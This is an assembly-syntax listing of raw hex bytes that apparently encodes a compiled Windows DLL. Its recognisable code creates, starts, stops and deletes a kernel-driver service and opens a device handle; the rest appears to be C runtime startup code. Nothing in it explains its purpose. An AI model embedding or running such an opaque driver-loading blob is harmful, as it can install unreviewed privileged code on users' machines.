DB 03CH,075H,030H,060H,000H,010H,074H,006H,056H,0E8H,0D0H,0FEH,0FFH,0FFH,046H
DB 081H,0FEH,000H,020H,000H,000H,072H,0E7H,0B8H,001H,000H,000H,000H,05FH,05EH
DB 0C2H,00CH,000H,068H,030H,0A0H,000H,010H,0BFH,030H,0A0H,000H,010H,068H,0E8H
DB 003H,000H,000H,0FFH,015H,04CH,0C1H,000H,010H,0B9H,0FFH,0FFH,0FFH,0FFH,02BH
DB 0C0H,0F2H,0AEH,0F7H,0D1H,080H,0B9H,02FH,0A0H,000H,010H,05CH,074H,033H,0BFH
DB 050H,050H,000H,010H,0B9H,0FFH,0FFH,0FFH,0FFH,02BH,0C0H,0F2H,0AEH,0F7H,0D1H
DB 02BH,0F9H,08BH,0D1H,08BH,0F7H,0B9H,0FFH,0FFH,0FFH,0FFH,0BFH,030H,0A0H,000H
DB 010H,02BH,0C0H,0F2H,0AEH,04FH,08BH,0CAH,0C1H,0E9H,002H,0F3H,0A5H,08BH,0CAH
DB 083H,0E1H,003H,0F3H,0A4H,0BFH,040H,050H,000H,010H,0B9H,0FFH,0FFH,0FFH,0FFH
DB 02BH,0C0H,0F2H,0AEH,0F7H,0D1H,02BH,0F9H,08BH,0D1H,08BH,0F7H,0B9H,0FFH,0FFH
DB 0FFH,0FFH,0BFH,030H,0A0H,000H,010H,02BH,0C0H,0F2H,0AEH,04FH,08BH,0CAH,0C1H
DB 0E9H,002H,0F3H,0A5H,08BH,0CAH,083H,0E1H,003H,0F3H,0A4H,0BFH,030H,060H,000H
DB 010H,0B8H,0FFH,0FFH,0FFH,0FFH,0B9H,000H,010H,000H,000H,0F3H,0ABH,0B8H,001H
DB 000H,000H,000H,05FH,05EH,0C2H,00CH,000H,0CCH,0CCH,0CCH,056H,057H,068H,03FH
DB 000H,00FH,000H,06AH,000H,06AH,000H,0FFH,015H,02CH,0C1H,000H,010H,08BH,0F8H
DB 08BH,074H,024H,00CH,08BH,044H,024H,010H,050H,056H,057H,0E8H,02DH,000H,000H
DB 000H,083H,0C4H,00CH,056H,057H,0E8H,063H,000H,000H,000H,08BH,04CH,024H,01CH
DB 083H,0C4H,008H,051H,056H,0E8H,0B5H,000H,000H,000H,083H,0C4H,008H,08BH,0F0H
DB 057H,0FFH,015H,030H,0C1H,000H,010H,08BH,0C6H,05FH,05EH,0C3H,0CCH,0CCH,0CCH
DB 0CCH,08BH,044H,024H,00CH,06AH,000H,06AH,000H,06AH,000H,06AH,000H,06AH,000H
DB 050H,06AH,001H,08BH,044H,024H,024H,06AH,003H,08BH,04CH,024H,024H,06AH,001H
DB 068H,0FFH,001H,00FH,000H,050H,050H,051H,0FFH,015H,03CH,0C1H,000H,010H,085H
DB 0C0H,075H,003H,033H,0C0H,0C3H,050H,0FFH,015H,030H,0C1H,000H,010H,0B8H,001H
DB 000H,000H,000H,0C3H,0CCH,08BH,044H,024H,008H,056H,08BH,04CH,024H,008H,057H
DB 068H,0FFH,001H,00FH,000H,050H,051H,0FFH,015H,038H,0C1H,000H,010H,08BH,0F8H
DB 085H,0FFH,075H,005H,033H,0C0H,05FH,05EH,0C3H,06AH,000H,06AH,000H,057H,0FFH
DB 015H,034H,0C1H,000H,010H,085H,0C0H,075H,012H,0BEH,000H,000H,000H,000H,0FFH
DB 015H,048H,0C1H,000H,010H,03DH,020H,004H,000H,000H,075H,005H,0BEH,001H,000H
DB 000H,000H,057H,0FFH,015H,030H,0C1H,000H,010H,08BH,0C6H,05FH,05EH,0C3H,0CCH
DB 0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,08BH,044H,024H,004H
DB 083H,0ECH,040H,08DH,04CH,024H,000H,050H,068H,054H,050H,000H,010H,051H,0FFH
DB 015H,0F0H,0C1H,000H,010H,083H,0C4H,00CH,08DH,04CH,024H,000H,06AH,000H,068H
DB 080H,000H,000H,000H,06AH,003H,06AH,000H,06AH,000H,068H,000H,000H,000H,0C0H
DB 051H,0FFH,015H,044H,0C1H,000H,010H,083H,0F8H,0FFH,075H,006H,033H,0C0H,083H
DB 0C4H,040H,0C3H,08BH,04CH,024H,048H,085H,0C9H,074H,00BH,089H,001H,0B8H,001H
DB 000H,000H,000H,083H,0C4H,040H,0C3H,050H,0FFH,015H,090H,0C1H,000H,010H,0B8H
DB 001H,000H,000H,000H,083H,0C4H,040H,0C3H,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH
DB 0CCH,0CCH,0CCH,056H,057H,068H,03FH,000H,00FH,000H,06AH,000H,06AH,000H,0FFH
DB 015H,02CH,0C1H,000H,010H,08BH,0F8H,08BH,074H,024H,00CH,056H,057H,0E8H,022H
DB 000H,000H,000H,083H,0C4H,008H,056H,057H,0E8H,068H,000H,000H,000H,083H,0C4H
DB 008H,057H,0FFH,015H,030H,0C1H,000H,010H,0B8H,001H,000H,000H,000H,05FH,05EH
DB 0C3H,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,08BH,044H,024H,008H,08BH,04CH,024H,004H
DB 083H,0ECH,01CH,056H,057H,068H,0FFH,001H,00FH,000H,050H,051H,0FFH,015H,038H
DB 0C1H,000H,010H,08BH,0F8H,085H,0FFH,075H,008H,033H,0C0H,05FH,05EH,083H,0C4H
DB 01CH,0C3H,08DH,044H,024H,008H,050H,06AH,001H,057H,0FFH,015H,028H,0C1H,000H
DB 010H,08BH,0F0H,057H,0FFH,015H,030H,0C1H,000H,010H,08BH,0C6H,05FH,05EH,083H
DB 0C4H,01CH,0C3H,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,08BH,044H,024H
DB 008H,056H,08BH,04CH,024H,008H,057H,068H,0FFH,001H,00FH,000H,050H,051H,0FFH
DB 015H,038H,0C1H,000H,010H,08BH,0F0H,085H,0F6H,075H,005H,033H,0C0H,05FH,05EH
DB 0C3H,056H,0FFH,015H,024H,0C1H,000H,010H,08BH,0F8H,056H,0FFH,015H,030H,0C1H
DB 000H,010H,08BH,0C7H,05FH,05EH,0C3H,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH
DB 0CCH,08BH,044H,024H,008H,083H,0F8H,001H,00FH,085H,0ECH,000H,000H,000H,0FFH
DB 015H,06CH,0C1H,000H,010H,083H,03DH,070H,050H,000H,010H,000H,0A3H,090H,050H
DB 000H,010H,075H,03EH,03CH,003H,075H,011H,0A9H,000H,000H,000H,080H,074H,00AH
DB 06AH,002H,0E8H,0BDH,00FH,000H,000H,083H,0C4H,004H,068H,07CH,050H,000H,010H
DB 0FFH,015H,068H,0C1H,000H,010H,085H,0C0H,074H,01AH,068H,074H,050H,000H,010H
DB 050H,0FFH,015H,064H,0C1H,000H,010H,085H,0C0H,074H,00AH,06AH,001H,0E8H,094H
DB 00FH,000H,000H,083H,0C4H,004H,0E8H,0FCH,004H,000H,000H,033H,0C9H,08BH,015H
DB 090H,050H,000H,010H,08AH,0CEH,08BH,0C2H,025H,0FFH,000H,000H,000H,0FFH,005H
DB 05CH,050H,000H,010H,0C1H,0EAH,010H,089H,00DH,09CH,050H,000H,010H,0A3H,098H
DB 050H,000H,010H,089H,015H,090H,050H,000H,010H,0C1H,0E0H,008H,003H,0C1H,0A3H
DB 094H,050H,000H,010H,0E8H,0F2H,002H,000H,000H,085H,0C0H,075H,00AH,0E8H,0D9H
DB 004H,000H,000H,033H,0C0H,0C2H,00CH,000H,0FFH,015H,060H,0C1H,000H,010H,0A3H
DB 040H,0B5H,000H,010H,0E8H,094H,00DH,000H,000H,083H,03DH,040H,0B5H,000H,010H
DB 000H,0A3H,060H,050H,000H,010H,074H,025H,085H,0C0H,074H,021H,0E8H,0BDH,004H
DB 000H,000H,0E8H,068H,00DH,000H,000H,0E8H,0D3H,007H,000H,000H,0E8H,0EEH,006H
DB 000H,000H,0E8H,079H,001H,000H,000H,0B8H,001H,000H,000H,000H,0C2H,00CH,000H
DB 0E8H,08CH,004H,000H,000H,033H,0C0H,0C2H,00CH,000H,085H,0C0H,075H,039H,0A1H
DB 05CH,050H,000H,010H,085H,0C0H,07EH,02BH,048H,083H,03DH,0C8H,050H,000H,010H
DB 000H,0A3H,05CH,050H,000H,010H,075H,005H,0E8H,096H,001H,000H,000H,0E8H,051H
DB 006H,000H,000H,0E8H,0CCH,002H,000H,000H,0E8H,057H,004H,000H,000H,0B8H,001H
DB 000H,000H,000H,0C2H,00CH,000H,033H,0C0H,0C2H,00CH,000H,083H,0F8H,003H,075H
DB 00AH,06AH,000H,0E8H,06EH,003H,000H,000H,083H,0C4H,004H,0B8H,001H,000H,000H
DB 000H,0C2H,00CH,000H,0CCH,0CCH,0CCH,053H,056H,057H,0BBH,001H,000H,000H,000H
DB 08BH,07CH,024H,014H,055H,03BH,0FBH,075H,02AH,001H,01DH,05CH,050H,000H,010H
DB 083H,0FFH,001H,074H,005H,083H,0FFH,002H,075H,050H,0A1H,044H,0B5H,000H,010H
DB 085H,0C0H,074H,02FH,08BH,06CH,024H,01CH,08BH,074H,024H,014H,055H,057H,056H
DB 0FFH,0D0H,08BH,0D8H,0EBH,026H,085H,0FFH,075H,0D8H,0A1H,05CH,050H,000H,010H
DB 085H,0C0H,07EH,008H,048H,0A3H,05CH,050H,000H,010H,0EBH,0C7H,033H,0C0H,05DH
DB 05FH,05EH,05BH,0C2H,00CH,000H,08BH,074H,024H,014H,08BH,06CH,024H,01CH,085H
DB 0DBH,074H,022H,055H,057H,056H,0E8H,043H,0FEH,0FFH,0FFH,08BH,0D8H,0EBH,008H
DB 08BH,074H,024H,014H,08BH,06CH,024H,01CH,085H,0DBH,074H,00EH,055H,057H,056H
DB 0E8H,00BH,0FBH,0FFH,0FFH,08BH,0D8H,085H,0DBH,075H,00FH,083H,0FFH,001H,075H
DB 00AH,0E8H,00BH,002H,000H,000H,0E8H,096H,003H,000H,000H,085H,0FFH,074H,005H
DB 083H,0FFH,003H,075H,022H,055H,057H,056H,0E8H,005H,0FEH,0FFH,0FFH,085H,0C0H
DB 075H,002H,033H,0DBH,085H,0DBH,074H,010H,0A1H,044H,0B5H,000H,010H,085H,0C0H
DB 074H,007H,055H,057H,056H,0FFH,0D0H,08BH,0D8H,08BH,0C3H,05DH,05FH,05EH,05BH
DB 0C2H,00CH,000H,0CCH,0CCH,0A1H,06CH,050H,000H,010H,083H,0F8H,001H,074H,00DH
DB 085H,0C0H,075H,00EH,083H,03DH,070H,050H,000H,010H,001H,075H,005H,0E8H,0C4H
DB 00DH,000H,000H,08BH,044H,024H,004H,050H,0E8H,0FAH,00DH,000H,000H,083H,0C4H
DB 004H,068H,0FFH,000H,000H,000H,0FFH,015H,068H,050H,000H,010H,083H,0C4H,004H
DB 0C3H,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0A1H,038H,0B5H,000H,010H,085H
DB 0C0H,074H,002H,0FFH,0D0H,068H,010H,050H,000H,010H,068H,008H,050H,000H,010H
DB 0E8H,0F6H,000H,000H,000H,083H,0C4H,008H,068H,004H,050H,000H,010H,068H,000H
DB 050H,000H,010H,0E8H,0E4H,000H,000H,000H,083H,0C4H,008H,0C3H,08BH,044H,024H
DB 004H,06AH,000H,06AH,001H,050H,0E8H,022H,000H,000H,000H,083H,0C4H,00CH,0C3H
DB 0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,06AH
DB 001H,06AH,000H,06AH,000H,0E8H,005H,000H,000H,000H,083H,0C4H,00CH,0C3H,0CCH
DB 053H,056H,0E8H,089H,000H,000H,000H,0C7H,005H,0C8H,050H,000H,010H,001H,000H
DB 000H,000H,083H,07CH,024H,010H,000H,08BH,05CH,024H,014H,088H,01DH,0C4H,050H
DB 000H,010H,075H,03FH,083H,03DH,03CH,0B5H,000H,010H,000H,074H,024H,08BH,035H
DB 034H,0B5H,000H,010H,083H,0EEH,004H,03BH,035H,03CH,0B5H,000H,010H,072H,013H
DB 08BH,006H,085H,0C0H,074H,002H,0FFH,0D0H,083H,0EEH,004H,03BH,035H,03CH,0B5H
DB 000H,010H,073H,0EDH,068H,01CH,050H,000H,010H,068H,014H,050H,000H,010H,0E8H
DB 052H,000H,000H,000H,083H,0C4H,008H,068H,024H,050H,000H,010H,068H,020H,050H
DB 000H,010H,0E8H,040H,000H,000H,000H,083H,0C4H,008H,085H,0DBH,074H,008H,0E8H
DB 024H,000H,000H,000H,05EH,05BH,0C3H,08BH,044H,024H,00CH,050H,0FFH,015H,070H
DB 0C1H,000H,010H,05EH,05BH,0C3H,0CCH,0CCH,0CCH,06AH,00DH,0E8H,079H,00FH,000H
DB 000H,083H,0C4H,004H,0C3H,0CCH,0CCH,0CCH,0CCH,0CCH,06AH,00DH,0E8H,0D9H,00FH
DB 000H,000H,083H,0C4H,004H,0C3H,0CCH,0CCH,0CCH,0CCH,0CCH,056H,057H,08BH,07CH
DB 024H,010H,08BH,074H,024H,00CH,03BH,0FEH,076H,00FH,08BH,006H,085H,0C0H,074H
DB 002H,0FFH,0D0H,083H,0C6H,004H,03BH,0FEH,077H,0F1H,05FH,05EH,0C3H,056H,0E8H
DB 09AH,00EH,000H,000H,0FFH,015H,07CH,0C1H,000H,010H,0A3H,0CCH,050H,000H,010H
DB 083H,0F8H,0FFH,075H,004H,033H,0C0H,05EH,0C3H,06AH,074H,06AH,001H,0E8H,08DH
DB 010H,000H,000H,083H,0C4H,008H,08BH,0F0H,085H,0F6H,074H,030H,056H,0A1H,0CCH
DB 050H,000H,010H,050H,0FFH,015H,078H,0C1H,000H,010H,085H,0C0H,074H,01FH,056H
DB 0E8H,04DH,000H,000H,000H,083H,0C4H,004H,0FFH,015H,074H,0C1H,000H,010H,089H
DB 006H,0B8H,001H,000H,000H,000H,0C7H,046H,004H,0FFH,0FFH,0FFH,0FFH,05EH,0C3H
DB 033H,0C0H,05EH,0C3H,0E8H,06BH,00EH,000H,000H,0A1H,0CCH,050H,000H,010H,083H
DB 0F8H,0FFH,074H,011H,050H,0FFH,015H,080H,0C1H,000H,010H,0C7H,005H,0CCH,050H
DB 000H,010H,0FFH,0FFH,0FFH,0FFH,0C3H,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH
DB 0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,08BH,044H,024H,004H,0C7H,040H,050H,038H
DB 057H,000H,010H,0C7H,040H,014H,001H,000H,000H,000H,0C3H,0CCH,0CCH,0CCH,0CCH
DB 0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,056H,057H,0FFH,015H,048H,0C1H
DB 000H,010H,08BH,0F0H,0A1H,0CCH,050H,000H,010H,050H,0FFH,015H,088H,0C1H,000H
DB 010H,08BH,0F8H,085H,0FFH,075H,047H,06AH,074H,06AH,001H,0E8H,0DBH,00FH,000H
DB 000H,083H,0C4H,008H,08BH,0F8H,085H,0FFH,074H,02BH,057H,0A1H,0CCH,050H,000H
DB 010H,050H,0FFH,015H,078H,0C1H,000H,010H,085H,0C0H,074H,01AH,057H,0E8H,09BH
DB 0FFH,0FFH,0FFH,083H,0C4H,004H,0FFH,015H,074H,0C1H,000H,010H,089H,007H,0C7H
DB 047H,004H,0FFH,0FFH,0FFH,0FFH,0EBH,00AH,06AH,010H,0E8H,080H,0FDH,0FFH,0FFH
DB 083H,0C4H,004H,056H,0FFH,015H,084H,0C1H,000H,010H,08BH,0C7H,05FH,05EH,0C3H
DB 0CCH,083H,03DH,0CCH,050H,000H,010H,0FFH,056H,00FH,084H,091H,000H,000H,000H
DB 08BH,074H,024H,008H,085H,0F6H,075H,012H,0A1H,0CCH,050H,000H,010H,050H,0FFH
DB 015H,088H,0C1H,000H,010H,08BH,0F0H,085H,0F6H,074H,069H,08BH,046H,024H,085H
DB 0C0H,074H,009H,050H,0E8H,0BBH,00FH,000H,000H,083H,0C4H,004H,08BH,046H,028H
DB 085H,0C0H,074H,009H,050H,0E8H,0ABH,00FH,000H,000H,083H,0C4H,004H,08BH,046H
DB 030H,085H,0C0H,074H,009H,050H,0E8H,09BH,00FH,000H,000H,083H,0C4H,004H,08BH
DB 046H,038H,085H,0C0H,074H,009H,050H,0E8H,08BH,00FH,000H,000H,083H,0C4H,004H
DB 08BH,046H,040H,085H,0C0H,074H,009H,050H,0E8H,07BH,00FH,000H,000H,083H,0C4H
DB 004H,08BH,046H,044H,085H,0C0H,074H,009H,050H,0E8H,06BH,00FH,000H,000H,083H
DB 0C4H,004H,056H,0E8H,062H,00FH,000H,000H,083H,0C4H,004H,06AH,000H,0A1H,0CCH
DB 050H,000H,010H,050H,0FFH,015H,078H,0C1H,000H,010H,05EH,0C3H,0CCH,0CCH,0CCH
DB 0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,06AH,000H,068H
DB 000H,010H,000H,000H,06AH,000H,0FFH,015H,08CH,0C1H,000H,010H,0A3H,030H,0B5H
DB 000H,010H,0C3H,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0A1H
DB 030H,0B5H,000H,010H,050H,0FFH,015H,054H,0C1H,000H,010H,0C3H,0CCH,0CCH,0CCH
DB 083H,0ECH,044H,053H,056H,057H,055H,068H,080H,004H,000H,000H,0E8H,01FH,00FH
DB 000H,000H,083H,0C4H,004H,08BH,0F0H,085H,0F6H,075H,00AH,06AH,01BH,0E8H,06FH
DB 0FCH,0FFH,0FFH,083H,0C4H,004H,08DH,086H,080H,004H,000H,000H,089H,035H,030H
DB 0B4H,000H,010H,0C7H,005H,020H,0B4H,000H,010H,020H,000H,000H,000H,03BH,0C6H
DB 076H,028H,033H,0C9H,0BAH,00AH,000H,000H,000H,088H,04EH,004H,083H,0C6H,024H
DB 0C7H,046H,0DCH,0FFH,0FFH,0FFH,0FFH,088H,056H,0E1H,089H,04EH,0E4H,0A1H,030H
DB 0B4H,000H,010H,005H,080H,004H,000H,000H,03BH,0C6H,077H,0DFH,08DH,044H,024H
DB 010H,050H,0FFH,015H,0A0H,0C1H,000H,010H,066H,083H,07CH,024H,042H,000H,00FH
DB 084H,0D5H,000H,000H,000H,083H,07CH,024H,044H,000H,00FH,084H,0CAH,000H,000H
DB 000H,08BH,044H,024H,044H,08BH,028H,08DH,078H,004H,081H,0FDH,000H,008H,000H
DB 000H,08DH,05CH,03DH,000H,07CH,005H,0BDH,000H,008H,000H,000H,039H,02DH,020H
DB 0B4H,000H,010H,07DH,05EH,0BEH,034H,0B4H,000H,010H,068H,080H,004H,000H,000H
DB 0E8H,077H,00EH,000H,000H,083H,0C4H,004H,085H,0C0H,074H,042H,08DH,088H,080H
DB 004H,000H,000H,089H,006H,083H,005H,020H,0B4H,000H,010H,020H,03BH,0C8H,076H
DB 022H,033H,0C9H,088H,048H,004H,083H,0C0H,024H,0C7H,040H,0DCH,0FFH,0FFH,0FFH
DB 0FFH,0C6H,040H,0E1H,00AH,089H,048H,0E4H,08BH,016H,081H,0C2H,080H,004H,000H
DB 000H,03BH,0D0H,077H,0E0H,083H,0C6H,004H,039H,02DH,020H,0B4H,000H,010H,07CH
DB 0AFH,0EBH,006H,08BH,02DH,020H,0B4H,000H,010H,033H,0F6H,085H,0EDH,07EH,044H
DB 08BH,003H,083H,0F8H,0FFH,074H,034H,0F6H,007H,001H,074H,02FH,050H,0FFH,015H
DB 098H,0C1H,000H,010H,085H,0C0H,074H,024H,08BH,0C6H,08BH,0CEH,083H,0E0H,0E7H
DB 083H,0E1H,01FH,0C1H,0F8H,003H,0C1H,0E1H,002H,08BH,090H,030H,0B4H,000H,010H
DB 08BH,003H,08DH,00CH,0C9H,003H,0CAH,089H,001H,08AH,017H,088H,051H,004H,046H
DB 047H,083H,0C3H,004H,03BH,0F5H,07CH,0BCH,033H,0F6H,033H,0FFH,08BH,01DH,030H
DB 0B4H,000H,010H,003H,0DEH,083H,03BH,0FFH,075H,057H,0B8H,0F6H,0FFH,0FFH,0FFH
DB 085H,0F6H,0C6H,043H,004H,081H,074H,00EH,08DH,047H,0FFH,083H,0F8H,001H,0B8H
DB 0F5H,0FFH,0FFH,0FFH,083H,0D0H,0FFH,050H,0FFH,015H,09CH,0C1H,000H,010H,083H
DB 0F8H,0FFH,08BH,0E8H,074H,028H,055H,0FFH,015H,098H,0C1H,000H,010H,085H,0C0H
DB 074H,01DH,025H,0FFH,000H,000H,000H,089H,02BH,083H,0F8H,002H,075H,006H,080H
DB 04BH,004H,040H,0EBH,015H,083H,0F8H,003H,075H,010H,080H,04BH,004H,008H,0EBH
DB 00AH,080H,04BH,004H,040H,0EBH,004H,080H,04BH,004H,080H,083H,0C6H,024H,047H
DB 083H,0FEH,06CH,07CH,08FH,0A1H,020H,0B4H,000H,010H,050H,0FFH,015H,094H,0C1H
DB 000H,010H,05DH,05FH,05EH,05BH,083H,0C4H,044H,0C3H,0CCH,0CCH,0CCH,0CCH,0CCH
DB 053H,056H,057H,0BEH,030H,0B4H,000H,010H,055H,08BH,03DH,0A4H,0C1H,000H,010H
DB 08BH,01EH,085H,0DBH,074H,030H,08DH,083H,080H,004H,000H,000H,03BH,0C3H,076H
DB 01BH,033H,0EDH,039H,06BH,008H,074H,006H,08DH,043H,00CH,050H,0FFH,0D7H,083H
DB 0C3H,024H,08BH,006H,005H,080H,004H,000H,000H,03BH,0C3H,077H,0E7H,08BH,006H
DB 050H,0E8H,0EEH,00CH,000H,000H,083H,0C4H,004H,083H,0C6H,004H,081H,0FEH,030H
DB 0B5H,000H,010H,072H,0BFH,05DH,05FH,05EH,05BH,0C3H,0CCH,0CCH,0CCH,0CCH,0CCH
DB 0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,083H,0ECH,004H,08BH,015H,060H,050H,000H,010H
DB 053H,056H,057H,033H,0F6H,055H,080H,03AH,000H,074H,01AH,080H,03AH,03DH,074H
DB 001H,046H,08BH,0FAH,0B9H,0FFH,0FFH,0FFH,0FFH,02BH,0C0H,0F2H,0AEH,0F7H,0D1H
DB 003H,0D1H,080H,03AH,000H,075H,0E6H,08DH,004H,0B5H,004H,000H,000H,000H,050H
DB 0E8H,0B5H,00CH,000H,000H,0A3H,0ACH,050H,000H,010H,083H,0C4H,004H,08BH,0D8H
DB 085H,0DBH,075H,00AH,06AH,009H,0E8H,000H,0FAH,0FFH,0FFH,083H,0C4H,004H,08BH
DB 02DH,060H,050H,000H,010H,08BH,0C5H,080H,07DH,000H,000H,074H,05EH,08BH,0FDH
DB 0B9H,0FFH,0FFH,0FFH,0FFH,02BH,0C0H,0F2H,0AEH,0F7H,0D1H,089H,04CH,024H,010H
DB 080H,07DH,000H,03DH,074H,03DH,051H,0E8H,072H,00CH,000H,000H,083H,0C4H,004H
DB 089H,003H,085H,0C0H,075H,00AH,06AH,009H,0E8H,0C2H,0F9H,0FFH,0FFH,083H,0C4H
DB 004H,08BH,0FDH,0B9H,0FFH,0FFH,0FFH,0FFH,02BH,0C0H,0F2H,0AEH,0F7H,0D1H,02BH
DB 0F9H,08BH,0C1H,0C1H,0E9H,002H,08BH,0F7H,08BH,03BH,083H,0C3H,004H,0F3H,0A5H
DB 08BH,0C8H,083H,0E1H,003H,0F3H,0A4H,003H,06CH,024H,010H,080H,07DH,000H,000H
DB 075H,0A2H,0A1H,060H,050H,000H,010H,050H,0E8H,006H,00CH,000H,000H,083H,0C4H
DB 004H,0C7H,003H,000H,000H,000H,000H,05DH,05FH,05EH,05BH,083H,0C4H,004H,0C3H
DB 0CCH,0CCH,0CCH,0CCH,0CCH,083H,0ECH,008H,056H,057H,068H,004H,001H,000H,000H
DB 0BEH,0C0H,05EH,000H,010H,056H,06AH,000H,0FFH,015H,05CH,0C1H,000H,010H,0A1H
DB 040H,0B5H,000H,010H,089H,035H,0BCH,050H,000H,010H,080H,038H,000H,074H,006H
DB 08BH,035H,040H,0B5H,000H,010H,08DH,044H,024H,00CH,08DH,04CH,024H,008H,050H
DB 051H,06AH,000H,06AH,000H,056H,0E8H,05EH,000H,000H,000H,08BH,044H,024H,01CH
DB 083H,0C4H,014H,0C1H,0E0H,002H,003H,044H,024H,00CH,050H,0E8H,0BAH,00BH,000H
DB 000H,083H,0C4H,004H,08BH,0F8H,085H,0FFH,075H,00AH,06AH,008H,0E8H,00AH,0F9H
DB 0FFH,0FFH,083H,0C4H,004H,08DH,044H,024H,00CH,08DH,04CH,024H,008H,08BH,054H
DB 024H,008H,050H,051H,08DH,004H,097H,050H,057H,056H,0E8H,01EH,000H,000H,000H
DB 08BH,044H,024H,01CH,083H,0C4H,014H,048H,089H,03DH,0A4H,050H,000H,010H,05FH
DB 0A3H,0A0H,050H,000H,010H,05EH,083H,0C4H,008H,0C3H,0CCH,0CCH,0CCH,0CCH,0CCH
DB 08BH,04CH,024H,014H,053H,08BH,054H,024H,014H,056H,08BH,074H,024H,00CH,057H
DB 08BH,044H,024H,018H,055H,083H,07CH,024H,018H,000H,0C7H,001H,000H,000H,000H
DB 000H,0C7H,002H,001H,000H,000H,000H,074H,00BH,08BH,054H,024H,018H,083H,044H
DB 024H,018H,004H,089H,002H,080H,03EH,022H,074H,046H,0FFH,001H,085H,0C0H,074H
DB 005H,08AH,016H,088H,010H,040H,08AH,016H,046H,033H,0DBH,08AH,0DAH,0F6H,083H
DB 001H,051H,000H,010H,004H,074H,00CH,0FFH,001H,085H,0C0H,074H,005H,08AH,01EH
DB 088H,018H,040H,046H,080H,0FAH,020H,074H,009H,084H,0D2H,074H,009H,080H,0FAH
DB 009H,075H,0CBH,084H,0D2H,075H,003H,04EH,0EBH,050H,085H,0C0H,074H,04CH,0C6H
DB 040H,0FFH,000H,0EBH,046H,046H,080H,03EH,022H,074H,030H,08AH,01EH,084H,0DBH
DB 074H,02AH,033H,0D2H,08AH,0D3H,0F6H,082H,001H,051H,000H,010H,004H,074H,00CH
DB 0FFH,001H,085H,0C0H,074H,006H,08AH,016H,046H,088H,010H,040H,0FFH,001H,085H
DB 0C0H,074H,005H,08AH,016H,088H,010H,040H,046H,080H,03EH,022H,075H,0D0H,0FFH
DB 001H,085H,0C0H,074H,004H,0C6H,000H,000H,040H,080H,03EH,022H,075H,001H,046H
DB 033H,0FFH,080H,03EH,000H,00FH,084H,0E8H,000H,000H,000H,08AH,016H,080H,0FAH
DB 020H,074H,005H,080H,0FAH,009H,075H,003H,046H,0EBH,0F1H,080H,03EH,000H,00FH
DB 084H,0D0H,000H,000H,000H,083H,07CH,024H,018H,000H,074H,00BH,08BH,054H,024H
DB 018H,083H,044H,024H,018H,004H,089H,002H,08BH,054H,024H,020H,0FFH,002H,0BBH
DB 001H,000H,000H,000H,033H,0EDH,080H,03EH,05CH,075H,007H,046H,045H,080H,03EH
DB 05CH,074H,0F9H,080H,03EH,022H,075H,024H,0F7H,0C5H,001H,000H,000H,000H,075H
DB 019H,085H,0FFH,074H,00CH,08DH,056H,001H,080H,03AH,022H,075H,004H,08BH,0F2H
DB 0EBH,002H,033H,0DBH,083H,0FFH,001H,01BH,0FFH,0F7H,0DFH,0C1H,0EDH,001H,08BH
DB 0D5H,04DH,085H,0D2H,074H,011H,085H,0C0H,074H,004H,0C6H,000H,05CH,040H,08BH
DB 0D5H,0FFH,001H,04DH,085H,0D2H,075H,0EFH,08AH,016H,084H,0D2H,074H,04FH,085H
DB 0FFH,075H,00AH,080H,0FAH,020H,074H,046H,080H,0FAH,009H,074H,041H,085H,0DBH
DB 074H,037H,085H,0C0H,074H,021H,033H,0DBH,08AH,0DAH,0F6H,083H,001H,051H,000H
DB 010H,004H,074H,006H,088H,010H,046H,040H,0FFH,001H,08AH,016H,040H,046H,088H
DB 050H,0FFH,0FFH,001H,0E9H,06FH,0FFH,0FFH,0FFH,033H,0DBH,08AH,0DAH,0F6H,083H
DB 001H,051H,000H,010H,004H,074H,003H,046H,0FFH,001H,0FFH,001H,046H,0E9H,057H
DB 0FFH,0FFH,0FFH,085H,0C0H,074H,004H,0C6H,000H,000H,040H,0FFH,001H,0E9H,00FH
DB 0FFH,0FFH,0FFH,083H,07CH,024H,018H,000H,074H,00AH,08BH,054H,024H,018H,0C7H
DB 002H,000H,000H,000H,000H,08BH,054H,024H,020H,05DH,05FH,05EH,05BH,0FFH,002H
DB 0C3H,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH
DB 083H,0ECH,018H,053H,056H,057H,055H,06AH,019H,0E8H,092H,007H,000H,000H,08BH
DB 044H,024H,030H,083H,0C4H,004H,050H,0E8H,015H,002H,000H,000H,083H,0C4H,004H
DB 08BH,0E8H,03BH,02DH,004H,052H,000H,010H,075H,014H,06AH,019H,0E8H,0E1H,007H
DB 000H,000H,083H,0C4H,004H,033H,0C0H,05DH,05FH,05EH,05BH,083H,0C4H,018H,0C3H
DB 085H,0EDH,075H,019H,0E8H,09BH,002H,000H,000H,06AH,019H,0E8H,0C4H,007H,000H
DB 000H,083H,0C4H,004H,033H,0C0H,05DH,05FH,05EH,05BH,083H,0C4H,018H,0C3H,0C7H
DB 044H,024H,010H,000H,000H,000H,000H,0B8H,028H,052H,000H,010H,039H,028H,00FH
DB 084H,09BH,000H,000H,000H,083H,0C0H,030H,0FFH,044H,024H,010H,03DH,018H,053H
DB 000H,010H,072H,0EAH,08DH,044H,024H,014H,050H,055H,0FFH,015H,058H,0C1H,000H
DB 010H,083H,0F8H,001H,00FH,085H,059H,001H,000H,000H,0BFH,000H,051H,000H,010H
DB 033H,0C0H,0B9H,040H,000H,000H,000H,0F3H,0ABH,0AAH,083H,07CH,024H,014H,001H
